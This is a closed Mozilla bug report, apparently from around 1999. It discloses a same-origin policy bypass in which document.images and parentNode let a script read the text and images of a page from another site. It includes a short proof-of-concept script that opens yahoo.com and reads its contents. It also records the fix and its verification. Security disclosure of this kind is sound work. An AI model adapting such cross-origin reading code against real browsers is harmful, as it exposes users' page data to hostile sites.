Closed Bug 17537 Opened 25 years ago Closed 25 years ago

document.images vulnerabilities

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

document.images is not protected by "Same origin" security policy, which leads to the following vulnerabilities: 1) Exposing the DOM of arbitrary documents (by using "parentNode") - at least reading arbitrary documents 2) Browsing the images of arbitrary documents. The code is: ---------------------------------------------------------- function f(o) { var s=''; var i; s = o.nodeValue; if ( o.childNodes ) for ( i = 0; i < o.childNodes.length; i++ ) s += f(o.childNodes[i]); return s; } function f2() { alert("The text is:\n"+f(a.document.images[0].parentNode.parentNode.parentNode.parentNode.parent Node)); alert("The first image is: '"+a.document.images[0].src+"'"); } a=window.open("http://www.yahoo.com"); setTimeout("f2()",10000); ----------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M14
Made "parentNode" subject to a same-origin test.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.